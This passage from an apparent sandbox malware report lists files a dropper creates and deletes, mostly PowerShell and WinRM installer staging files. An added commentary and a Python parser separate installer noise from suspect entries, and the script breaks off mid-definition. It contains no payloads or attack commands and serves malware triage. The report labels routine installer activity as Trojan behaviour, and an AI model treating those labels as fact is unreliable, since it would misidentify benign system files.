%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1499 bytes)
%WinDir%\inf\oem11.PNF (13062 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (240837 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%WinDir%\inf\oem11.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)

The Trojan deletes the following file(s):

%System%\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\SET20.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET32.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (0 bytes)
%System%\SET7.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\SET6.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\wbem\SET4.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\SET22.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%System%\SET8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\SET21.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\SET5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%WinDir%\inf\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%WinDir%\Temp\UPD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%System%\wbem\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrm\0409\SET1D.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%WinDir%\inf\SET19.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\winrm\0409\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%WinDir%\Help\SETC5.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (0 bytes)
%System%\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)

The process PSCustomSetupUtil.exe:3920 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\67EKQW17\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)

The process PSCustomSetupUtil.exe:2868 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\84AFKPV0\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)

The process PSCustomSetupUtil.exe:2908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\98EJOUZ4\System.Management.Automation.dll (81046 bytes)

The process PSCustomSetupUtil.exe:1784 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\79GLRX39\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)

The process PSCustomSetupUtil.exe:2924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\MJPU05AF\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)

The process PSCustomSetupUtil.exe:3320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\CELRW28E\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)

The process PSCustomSetupUtil.exe:3000 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\ZW27CINS\Microsoft.PowerShell.Editor.dll (32824 bytes)

The process PSCustomSetupUtil.exe:2424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\GDJOTY49\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3164 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\URX27CHN\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)

The process PSCustomSetupUtil.exe:2176 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\KLSX39FL\Microsoft.WSMan.Management.dll (9608 bytes)

The process PSCustomSetupUtil.exe:2684 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\QNTY38EJ\Microsoft.PowerShell.Security.resources.dll (9 bytes)

The process PSCustomSetupUtil.exe:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\14BHNTY4\Microsoft.PowerShell.Security.dll (2392 bytes)

The process PSCustomSetupUtil.exe:2460 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\KFLQV05B\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\95BHMRW1\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)

The process PSCustomSetupUtil.exe:2588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\ECHMSX27\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)

The process PSCustomSetupUtil.exe:3464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\517CINSX\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\Y4BHNTZ4\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)

The process PSCustomSetupUtil.exe:1880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\GEKPUZ5A\System.Management.Automation.resources.dll (9320 bytes)

The process PSCustomSetupUtil.exe:3392 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\KKRW16BG\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)

The process PSCustomSetupUtil.exe:780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\35CIOUZ5\Microsoft.WSMan.Runtime.dll (7 bytes)

The process PSCustomSetupUtil.exe:2556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\NLRW16BH\Microsoft.WSMan.Management.resources.dll (13 bytes)

The process PSCustomSetupUtil.exe:3784 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\ZV17CHMR\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)

The process PSCustomSetupUtil.exe:2572 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\MKQV05AG\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)

The process mscorsvw.exe:3848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (2260 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (172 bytes)
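
Almost every path above is the footprint of the bundled WindowsXP-KB968930-x86-ENG.exe (the Windows Management Framework Core package: PowerShell 2.0 and WinRM 2.0) rather than of the dropper itself: the SET*.tmp entries are SetupAPI copy-then-rename staging files, the %WinDir%\assembly\tmp\* DLLs and ngen_service.log are ngen.exe native-image bookkeeping, and the WindowsPowerShell\v1.0, winrm*, winrs* and Wsm* files are the installed components. The same holds for the registry section that follows: the Cryptography\RNG "Seed" value is rewritten by the CryptoAPI random-number generator in any process that uses it, and the NGenService keys are ngen's compilation queue. The script below is an added example, not part of the Lavasoft report, that parses the report's own line format and separates that installer noise from the entries that still need a human look (for instance the _000002_/_000003_.tmp.dll and UPD3.tmp entries). The verdict names and the grouping of name fragments into "installer footprint" are this example's assumptions; the embedded sample is a constructed subset of lines copied from this report.

```python
import re
from collections import Counter

# Constructed sample: lines copied from the report's file-system and registry
# sections, in the report's own layout, so the parser can be run offline.
SAMPLE_REPORT = """\
The process update.exe:576 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\\SET30.tmp (14 bytes)
%System%\\WindowsPowerShell\\v1.0\\SETA8.tmp (9 bytes)
%WinDir%\\inf\\SET33.tmp (12 bytes)

The Trojan deletes the following file(s):

%WinDir%\\_000003_.tmp.dll (0 bytes)
%System%\\wevtfwd.dll (0 bytes)
%System%\\winrm.vbs (0 bytes)
%System%\\WsmSvc.dll (0 bytes)
%WinDir%\\$968930Uinstall_KB968930$\\SETBE.tmp (0 bytes)
%WinDir%\\Temp\\UPD3.tmp (0 bytes)

The process PSCustomSetupUtil.exe:2908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\\assembly\\tmp\\98EJOUZ4\\System.Management.Automation.dll (81046 bytes)

The process mscorsvw.exe:3848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\\Microsoft.NET\\Framework\\v4.0.30319\\ngen_service.log (2260 bytes)

The process ngen.exe:1788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\\SOFTWARE\\Microsoft\\Cryptography\\RNG]
"Seed" = "71 BD 81 F0 8A 43 51 B2 18 F5 92 0F 6C DC 9C 37"

[HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v2.0.50727\\NGenService\\ListenedState]
"RootstoreDirty" = "1"
"""

PROC_RE = re.compile(r"^The process (?P<proc>.+?):(?P<pid>\d+) makes changes in the (?P<where>file system|system registry)\.$")
ACTION_RE = re.compile(r"^The Trojan (?P<action>creates and/or writes to|deletes|creates and/or sets) the following")
FILE_RE = re.compile(r"^(?P<path>%\w+%\\.+?) \((?P<size>\d+) bytes\)$")
KEY_RE = re.compile(r"^\[(?P<key>HK[A-Z]+\\.+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)" = "(?P<value>.*)"$')

# Verdict rules. The name fragments come from the report; grouping them as the
# footprint of the bundled Windows Management Framework Core installer
# (WindowsXP-KB968930-x86-ENG.exe: PowerShell 2.0 + WinRM 2.0), SetupAPI
# staging files, ngen native-image bookkeeping and CryptoAPI seed updates is
# this example's own assumption, not a verdict from the sandbox.
FILE_RULES = [
    ("setupapi-staging", re.compile(r"\\SET[0-9A-F]{1,2}\.tmp$", re.I)),
    ("wmf-installer", re.compile(
        r"\\WindowsPowerShell\\v1\.0\\|\\winrm|\\winrs|\\wsm|\\wevtfwd\.dll$"
        r"|\\windowsremotemanagement\.adm$|\\WindowsRemoteShell\.adm$|\\EventForwarding\.adm$"
        r"|\\\$968930Uinstall_KB968930\$\\"
        r"|\\assembly\\tmp\\[0-9A-Z]{8}\\(?:Microsoft\.PowerShell|Microsoft\.WSMan"
        r"|System\.Management\.Automation|Microsoft\.BackgroundIntelligentTransfer)", re.I)),
    ("ngen-log", re.compile(r"\\Microsoft\.NET\\Framework\\[^\\]+\\ngen_service\.log$", re.I)),
]
REG_RULES = [
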